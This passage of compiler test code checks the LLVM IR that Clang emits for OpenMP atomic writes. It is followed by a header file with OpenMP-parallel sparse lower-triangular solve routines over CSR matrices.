// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx3_packed.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i64, i64* bitcast (%struct.BitFields4* @{{.+}} to i64*) monotonic, align 8
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i64 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[ZEXT:%.+]] = zext i32 [[NEW_VAL]] to i64
// CHECK: [[BF_AND:%.+]] = and i64 [[ZEXT]], 1
// CHECK: [[BF_VALUE:%.+]] = shl i64 [[BF_AND]], 16
// CHECK: [[BF_CLEAR:%.+]] = and i64 %{{.+}}, -65537
// CHECK: or i64 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i64 %{{.+}}, i64* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i64, i64* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i64* bitcast (%struct.BitFields4* @{{.+}} to i64*), i64 [[OLD_BF_VALUE]], i64 [[NEW_BF_VALUE]] monotonic monotonic, align 8
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i64, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i64, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx4.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i8, i8* getelementptr inbounds (%struct.BitFields4_packed, %struct.BitFields4_packed* @{{.+}}, i32 0, i32 0, i64 2) monotonic, align 1
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i8 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[TRUNC:%.+]] = trunc i32 [[NEW_VAL]] to i8
// CHECK: [[BF_VALUE:%.+]] = and i8 [[TRUNC]], 1
// CHECK: [[BF_CLEAR:%.+]] = and i8 %{{.+}}, -2
// CHECK: or i8 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i8 %{{.+}}, i8* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i8, i8* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i8* getelementptr inbounds (%struct.BitFields4_packed, %struct.BitFields4_packed* @{{.+}}, i32 0, i32 0, i64 2), i8 [[OLD_BF_VALUE]], i8 [[NEW_BF_VALUE]] monotonic monotonic, align 1
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i8, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i8, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx4_packed.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i64
// CHECK: [[PREV_VALUE:%.+]] = load atomic i64, i64* bitcast (%struct.BitFields4* @{{.+}} to i64*) monotonic, align 8
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i64 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BF_AND:%.+]] = and i64 [[NEW_VAL]], 127
// CHECK: [[BF_VALUE:%.+]] = shl i64 [[BF_AND]], 17
// CHECK: [[BF_CLEAR:%.+]] = and i64 %{{.+}}, -16646145
// CHECK: or i64 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i64 %{{.+}}, i64* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i64, i64* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i64* bitcast (%struct.BitFields4* @{{.+}} to i64*), i64 [[OLD_BF_VALUE]], i64 [[NEW_BF_VALUE]] monotonic monotonic, align 8
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i64, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i64, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx4.b = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i64
// CHECK: [[PREV_VALUE:%.+]] = load atomic i8, i8* getelementptr inbounds (%struct.BitFields4_packed, %struct.BitFields4_packed* @{{.+}}, i32 0, i32 0, i64 2) monotonic, align 1
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i8 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[TRUNC:%.+]] = trunc i64 [[NEW_VAL]] to i8
// CHECK: [[BF_AND:%.+]] = and i8 [[TRUNC]], 127
// CHECK: [[BF_VALUE:%.+]] = shl i8 [[BF_AND]], 1
// CHECK: [[BF_CLEAR:%.+]] = and i8 %{{.+}}, 1
// CHECK: or i8 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i8 %{{.+}}, i8* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i8, i8* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i8* getelementptr inbounds (%struct.BitFields4_packed, %struct.BitFields4_packed* @{{.+}}, i32 0, i32 0, i64 2), i8 [[OLD_BF_VALUE]], i8 [[NEW_BF_VALUE]] monotonic monotonic, align 1
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i8, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i8, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic relaxed write
bfx4_packed.b = ldv;
// CHECK: load i64, i64*
// CHECK: [[VEC_ITEM_VAL:%.+]] = uitofp i64 %{{.+}} to float
// CHECK: [[I64VAL:%.+]] = load atomic i64, i64* bitcast (<2 x float>* [[DEST:@.+]] to i64*) monotonic, align 8
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_I64:%.+]] = phi i64 [ [[I64VAL]], %{{.+}} ], [ [[FAILED_I64_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BITCAST:%.+]] = bitcast <2 x float>* [[LDTEMP:%.+]] to i64*
// CHECK: store i64 [[OLD_I64]], i64* [[BITCAST]],
// CHECK: [[VEC_VAL:%.+]] = load <2 x float>, <2 x float>* [[LDTEMP]]
// CHECK: [[NEW_VEC_VAL:%.+]] = insertelement <2 x float> [[VEC_VAL]], float [[VEC_ITEM_VAL]], i64 0
// CHECK: store <2 x float> [[NEW_VEC_VAL]], <2 x float>* [[LDTEMP]]
// CHECK: [[NEW_I64:%.+]] = load i64, i64* [[BITCAST]]
// CHECK: [[RES:%.+]] = cmpxchg i64* bitcast (<2 x float>* [[DEST]] to i64*), i64 [[OLD_I64]], i64 [[NEW_I64]] monotonic monotonic, align 8
// CHECK: [[FAILED_I64_OLD_VAL:%.+]] = extractvalue { i64, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i64, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write relaxed
float2x.x = ulv;
// CHECK: call i32 @llvm.read_register.i32(
// CHECK: sitofp i32 %{{.+}} to double
// CHECK: bitcast double %{{.+}} to i64
// CHECK: store atomic i64 %{{.+}}, i64* bitcast (double* @{{.+}} to i64*) seq_cst, align 8
// CHECK: call{{.*}} @__kmpc_flush(
#pragma omp atomic write seq_cst
dv = rix;
return 0;
}
#endif
|
fs_csr_executor.h |
void fs_csr_executor (int n, int* rowPtr, int* colIdx, double* val, double *b, double *x,
int levels, int *levelPtr, int *levelSet, int chunk){
for (int l = 0; l < levels; ++l) {
int li=0;
#pragma omp parallel for default(shared) private(li) schedule(auto)
for ( li = levelPtr[l]; li < levelPtr[l + 1]; ++li) {
int i = levelSet[li];
int tmp = b[i];
for (int j=rowPtr[i]; j<rowPtr[i+1]-1;j++) {
tmp -= val[j]*x[colIdx[j]];
}
x[i] = tmp / val[rowPtr[i+1]-1];
}
}
}
void fs_csr_executor_H2 (int n, int* rowPtr, int* colIdx, double* val, double *b, double *x,
int levels, int *levelPtr, int *levelSet,
int parts, int *parPtr, int *partition,
int chunk){
for (int i1 = 0; i1 < levels ; ++i1) {
#pragma omp parallel //shared(lValues)//private(map, contribs)
{
#pragma omp for schedule(auto)
for (int j1 = levelPtr[i1]; j1 < levelPtr[i1 + 1]; ++j1) {
for (int k1 = parPtr[j1]; k1 < parPtr[j1 + 1]; ++k1) {
int i = partition[k1];
double tmp = b[i];
for (int j=rowPtr[i]; j<rowPtr[i+1]-1;j++) {
tmp -= val[j]*x[colIdx[j]];
}
x[i] = tmp / val[rowPtr[i+1]-1];
}
}
}
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.